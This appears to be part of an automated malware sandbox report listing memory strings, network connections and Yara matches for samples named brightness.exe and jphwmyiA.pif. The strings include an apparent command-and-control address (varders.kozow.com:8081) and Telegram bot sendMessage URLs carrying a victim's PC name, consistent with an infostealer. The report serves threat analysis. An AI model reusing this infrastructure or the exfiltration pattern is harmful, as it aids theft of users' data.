Source: brightness.exe, 00000008.00000002.2228361462.0000000020510000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2200013988.0000000000874000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2230547224.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2232389580.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2199559053.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002460000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000003.2318831229.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2359054584.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002534000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: jphwmyiA.pif, 0000000C.00000002.3451586724.0000000028909000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3451586724.000000002893C000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3452191252.000000001D6AF000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000003.2732557349.000000002D31A000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A4CD000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000003.2732597157.000000002D340000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3452062242.000000002D2A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: brightness.exe, 00000008.00000002.2228361462.0000000020510000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2200013988.0000000000874000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2230547224.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2232389580.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2199559053.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3441525726.00000000244F4000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3451586724.000000002893C000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002460000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000003.2318831229.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2359054584.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002534000.00000004.00001000.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3452191252.000000001D6AF000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000003.2732557349.000000002D31A000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000003.2732597157.000000002D340000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000003.2732629706.000000002D332000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3452062242.000000002D2A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: brightness.exe, 00000008.00000003.2199216003.000000007F3EF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2228361462.0000000020510000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2207465458.000000007F3AA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2230785597.00000000214AA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2206791912.0000000021427000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2231404841.00000000215F2000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2232007845.0000000021700000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2199559053.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002460000.00000004.00001000.00020000.00000000.sdmp, jphwmyiA.pif.8.dr	String found in binary or memory: http://ocsp.comodoca.com0$
Source: brightness.exe, 00000008.00000002.2228361462.0000000020510000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2200013988.0000000000874000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2230547224.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2232389580.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2199559053.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002460000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000003.2318831229.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2359054584.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002534000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: brightness.exe, 00000008.00000002.2228361462.0000000020510000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2200013988.0000000000874000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2230547224.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2232389580.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2199559053.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002460000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000003.2318831229.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2359054584.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002534000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: brightness.exe, 00000008.00000002.2228361462.0000000020510000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2200013988.0000000000874000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2230547224.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2232389580.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2199559053.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002460000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000003.2318831229.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2359054584.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002534000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: jphwmyiA.pif, 00000014.00000003.2732597157.000000002D340000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3452062242.000000002D2A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: brightness.exe, 00000008.00000002.2228361462.0000000020510000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2200013988.0000000000874000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2230547224.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2232389580.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2199559053.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002460000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000003.2318831229.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2359054584.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002534000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0C
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.00000000261D1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A451000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A3C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: jphwmyiA.pif, 0000000C.00000003.2210977844.0000000024507000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3443379570.0000000025EE9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3444740302.00000000261D1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3450918250.0000000028730000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3452644011.0000000028FC0000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3451247424.000000001CB10000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A451000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3451626441.000000001D140000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3443379993.000000001A199000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000003.2330033359.00000000187DC000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3441954113.0000000029FF9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3451706486.000000002D020000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000014.00000003.2406157824.00000000283ED000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3450696077.000000002C9B0000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A3C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: brightness.exe, 00000008.00000003.2199216003.000000007F3EF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2228361462.0000000020510000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2207465458.000000007F3AA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2230785597.00000000214AA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2206791912.0000000021427000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2231404841.00000000215F2000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2232007845.0000000021700000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2232389580.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2199559053.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002460000.00000004.00001000.00020000.00000000.sdmp, jphwmyiA.pif.8.dr	String found in binary or memory: http://www.pmail.com0
Source: jphwmyiA.pif, 0000000C.00000002.3446215142.00000000274A2000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3446431807.000000001B722000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3446220044.000000002B693000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A536000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A4A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: jphwmyiA.pif, 0000000C.00000003.2210977844.0000000024507000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3443379570.0000000025EE9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3450918250.0000000028730000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3452644011.0000000028FC0000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3451247424.000000001CB10000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3451626441.000000001D140000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3443379993.000000001A199000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000003.2330033359.00000000187DC000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A536000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3441954113.0000000029FF9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3451706486.000000002D020000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A4A9000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000003.2406157824.00000000283ED000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3450696077.000000002C9B0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A536000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A4A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A536000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A4A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20a
Source: jphwmyiA.pif, 0000000C.00000002.3446215142.00000000274A2000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3446431807.000000001B722000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3446220044.000000002B693000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: jphwmyiA.pif, 0000000C.00000002.3446215142.00000000274A2000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3446431807.000000001B722000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3446220044.000000002B693000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: jphwmyiA.pif, 0000000C.00000002.3446215142.00000000274A2000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3446431807.000000001B722000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3446220044.000000002B693000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A4CD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: jphwmyiA.pif, 0000000C.00000002.3446215142.00000000274A2000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3446431807.000000001B722000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3446220044.000000002B693000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: jphwmyiA.pif, 0000000C.00000002.3446215142.00000000274A2000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3446431807.000000001B722000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3446220044.000000002B693000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: jphwmyiA.pif, 0000000C.00000002.3446215142.00000000274A2000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3446431807.000000001B722000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3446220044.000000002B693000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A503000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A50E000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A451000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A536000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A413000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A482000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A4A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: jphwmyiA.pif, 0000000C.00000003.2210977844.0000000024507000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3443379570.0000000025EE9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3444740302.000000002621F000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3450918250.0000000028730000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3452644011.0000000028FC0000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3451247424.000000001CB10000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A451000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3451626441.000000001D140000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3443379993.000000001A199000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000003.2330033359.00000000187DC000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A413000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3441954113.0000000029FF9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3451706486.000000002D020000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000014.00000003.2406157824.00000000283ED000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3450696077.000000002C9B0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A43C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A4BD000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A503000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A50E000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A536000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A482000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A4A9000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A43C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.1894
Source: brightness.exe, 00000008.00000002.2228361462.0000000020510000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2200013988.0000000000874000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2230547224.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2232389580.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2199559053.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3451586724.0000000028909000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3451586724.000000002893C000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002460000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000003.2318831229.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2359054584.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002534000.00000004.00001000.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3452191252.000000001D6AF000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000003.2732557349.000000002D31A000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A4CD000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000003.2732597157.000000002D340000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3452062242.000000002D2A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: jphwmyiA.pif, 0000000C.00000002.3446215142.00000000274A2000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3446431807.000000001B722000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3446220044.000000002B693000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: jphwmyiA.pif, 0000000C.00000002.3446215142.00000000274A2000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3446431807.000000001B722000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3446220044.000000002B693000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A4CD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49941
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49939
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49927
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49926
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49920
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49914 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49982 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49914
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49913
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49912
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49913 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49920 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49986 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50001 version: TLS 1.2

Source: Yara match	File source: Process Memory Space: jphwmyiA.pif PID: 6396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jphwmyiA.pif PID: 2228, type: MEMORYSTR
